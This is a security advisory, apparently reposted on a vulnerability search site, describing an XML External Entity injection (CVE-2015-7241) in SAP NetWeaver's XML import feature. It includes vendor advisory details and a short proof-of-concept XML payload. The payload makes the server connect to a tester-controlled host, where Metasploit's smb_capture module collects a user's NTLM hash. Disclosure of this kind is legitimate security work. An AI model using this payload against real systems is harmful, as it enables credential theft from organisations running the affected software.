Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2015-7241

Publish Date: 22 Sep 2015

                							

                Title: SAP Netwaver - XML External Entity Injection
Author: Lukasz Miedzinski
GPG: Public key provided in attachment
Date: 29/10/2014
CVE: CVE-2015-7241

Affected software :
===================

SAP Netwear : &lt;7.01

Vendor advisories (only for customers):
===================
External ID : 851975 2014
Title:  XML External Entity vulnerability in SAP XML Parser
Security Note: 2098608
Advisory Plan Date: 12/5/2014
Delivery date of fix/Patch Day: 10/2/2014
CVSS Base Score: 5.5
CVSS Base Vector: AV:N/AC:L/AU:S/C:P/I:N/A:P


Description :
=============
XML External Entity Injection vulnerability has been found in the XML
parser in the System

Administration-&gt;XML Content and Actions -&gt; Import section.


Vulnerabilities :
*****************

XML External Entity Injection :
======================


Example show how pentester is able to get NTLM hash of application's user.

Content of file (PoC) :

&lt;?xml version="1.0" encoding="UTF-8"?&gt;
&lt;!DOCTYPE root [
&lt;!ENTITY % remote SYSTEM "file:////Tester.IP/test"&gt; %remote; %param1; ]&gt;
&lt;root/&gt;

When pentester has metasploit smb_capture module run, then application
will contatc him and provide

NTLM hash of user.


Contact :
=========

Lukasz[dot]Miedzinski[at]gmail[dot]com

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

SAP NetWeaver < 7.01 - XML External Entity Injection

Vulmon Search

About

Products

Connect